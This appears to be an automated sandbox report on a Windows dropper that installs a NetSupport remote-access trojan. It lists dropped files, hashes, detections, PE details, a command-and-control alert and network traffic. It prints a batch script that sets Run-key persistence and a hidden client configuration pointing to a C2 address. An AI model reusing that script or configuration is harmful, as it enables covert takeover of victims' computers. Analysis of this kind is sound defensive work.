                                                                                    Size (bytes):3735416
                                                                                    Entropy (8bit):6.525042992590476
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                    MD5:00587238D16012152C2E951A087F2CC9
                                                                                    SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                    SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                    SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\TCCTL32.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):396664
                                                                                    Entropy (8bit):6.809064783360712
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                    MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                    SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                    SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                    SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\bild.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):105848
                                                                                    Entropy (8bit):4.68250265552195
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                    MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                    SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                    SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\client32.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):701
                                                                                    Entropy (8bit):5.5326954211374355
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:yZqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuYIAlkz6:QqzEmPZly6YBlLoG1fXXfDirIAaz6
                                                                                    MD5:0F81A0520491093CA88F974D4FBAFE11
                                                                                    SHA1:555B4DCF7612435066DE5B5DC319855A48D5EAF7
                                                                                    SHA-256:2C27FB0A37F8BDFCCE98DAB852DEE3C2950C9810394A441A19ECE63C64DAF818
                                                                                    SHA-512:7B68AE33017D28A37982E718F0393FF7047C43B50AAD595D48A0AC61268D6D4162319D8B41B9997B577649D323206A4764E5D502CBC3715DAD35692253D8A9E0
                                                                                    Malicious:false
                                                                                    Preview:0x137310df....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.76.253.210:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

                                                                                    C:\Users\Public\Netstat\msvcr100.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):773968
                                                                                    Entropy (8bit):6.901559811406837
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\netsup.bat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):5.151957838855328
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:hwszH1j0KpIAgidquH2QcfoZH1j0KpIAgidquH2QW3A:HVj0Kprgidqu++Vj0Kprgidqu2w
                                                                                    MD5:7604BB3E3698A7074FF39ECA4195391F
                                                                                    SHA1:F07E84CED88C3076B7A295FD845F7E420DCC3AF8
                                                                                    SHA-256:FE14D5B612CC516A7DDE97E3FE93FE35573F808B036E9C9513FCEADCB1BCC751
                                                                                    SHA-512:8639E1079F8E2DFD6AFB7CDCF4C6326B514A10C41841BEE035F62BA2234E60F13625515588787339CE1C469925595060EA2A9A1F2B3A60AA0D378F00540872C6
                                                                                    Malicious:true
                                                                                    Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..start %Public%\Netstat\bild.exe..

                                                                                    C:\Users\Public\Netstat\nskbfltr.inf

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:Windows setup INFormation
                                                                                    Category:dropped
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):4.93007757242403
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                    Malicious:false
                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                    C:\Users\Public\Netstat\pcicapi.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33144
                                                                                    Entropy (8bit):6.737780491933496
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                    MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                    SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                    SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                    SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\remcmdstub.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):77224
                                                                                    Entropy (8bit):6.793971095882093
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                    MD5:325B65F171513086438952A152A747C4
                                                                                    SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                    SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                    SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.940363800405678
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File size:2'138'135 bytes
                                                                                    MD5:47cfce938a71540a2039aebd5abe0783
                                                                                    SHA1:641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
                                                                                    SHA256:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
                                                                                    SHA512:338c95a30ccfbfe81b9a12d6ce01a68fdc3ace65da5fff17ccd06dbb4aa135cdf5ce3947107fd2ea46d32406bf6b30c908b6af673268b7c2ca554a7b67ddd4a1
                                                                                    SSDEEP:49152:VIf96RO0EkHbG+xw6NbHHBp7k5hhelN6YawnqLKwgVRl:VIFP6wYt5ShAiYawbwW
                                                                                    TLSH:CBA52302F9C6C5B2D53308390A68AB55797DBF342F28DD6FA78D5E1ACA301917338A53
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......

                                                                                    File Icon

                                                                                    Icon Hash:1515d4d4442f2d2d

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x41d779
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:00be6e6c4f9e287672c8301b72bdabf3

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FF324E6C4CFh
                                                                                    jmp 00007FF324E6BEC3h
                                                                                    cmp ecx, dword ptr [0043A1C8h]
                                                                                    jne 00007FF324E6C035h
                                                                                    ret
                                                                                    jmp 00007FF324E6C646h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 00430FE8h
                                                                                    mov dword ptr [ecx], 00431994h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FF324E5F5CDh
                                                                                    mov dword ptr [esi], 004319A0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 004319A8h
                                                                                    mov dword ptr [ecx], 004319A0h
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 00431988h
                                                                                    push eax
                                                                                    call 00007FF324E6F1DEh
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 00431988h
                                                                                    push eax
                                                                                    call 00007FF324E6F1C7h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx
                                                                                    je 00007FF324E6C03Ch
                                                                                    push 0000000Ch
                                                                                    push esi
                                                                                    call 00007FF324E6B602h
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0Ch
                                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                                    call 00007FF324E6BF9Eh
                                                                                    push 00437B58h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    push eax
                                                                                    call 00007FF324E6E8C6h
                                                                                    int3
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0Ch

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                    • [C++] VS2015 UPD3.1 build 24215
                                                                                    • [EXP] VS2015 UPD3.1 build 24215
                                                                                    • [RES] VS2015 UPD3 build 24213
                                                                                    • [LNK] VS2015 UPD3.1 build 24215

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                    PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                    RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                    RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                    RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                    RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                    RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                    RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                    RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                    RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                    RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                    RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                    RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                    RT_DIALOG0x692400x318data0.476010101010101
                                                                                    RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                    RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                    RT_STRING0x699a00x246data0.41924398625429554
                                                                                    RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                    RT_STRING0x69dc40xdcdata0.65
                                                                                    RT_STRING0x69ea00x468data0.375
                                                                                    RT_STRING0x6a3080x164data0.5056179775280899
                                                                                    RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                    RT_STRING0x6a5500x158data0.4563953488372093
                                                                                    RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                    RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                    RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                    RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                    gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-24T17:37:03.193758+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.44973045.76.253.210443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 24, 2024 17:37:03.193758011 CET49730443192.168.2.445.76.253.210
                                                                                    Dec 24, 2024 17:37:03.193825960 CET4434973045.76.253.210192.168.2.4
                                                                                    Dec 24, 2024 17:37:03.193918943 CET49730443192.168.2.445.76.253.210
                                                                                    Dec 24, 2024 17:37:03.493812084 CET49730443192.168.2.445.76.253.210
                                                                                    Dec 24, 2024 17:37:03.493850946 CET4434973045.76.253.210192.168.2.4
                                                                                    Dec 24, 2024 17:37:03.493935108 CET4434973045.76.253.210192.168.2.4
                                                                                    Dec 24, 2024 17:37:04.249037981 CET4973180192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:04.371597052 CET8049731104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:04.371680975 CET4973180192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:04.371897936 CET4973180192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:04.491503954 CET8049731104.26.1.231192.168.2.4
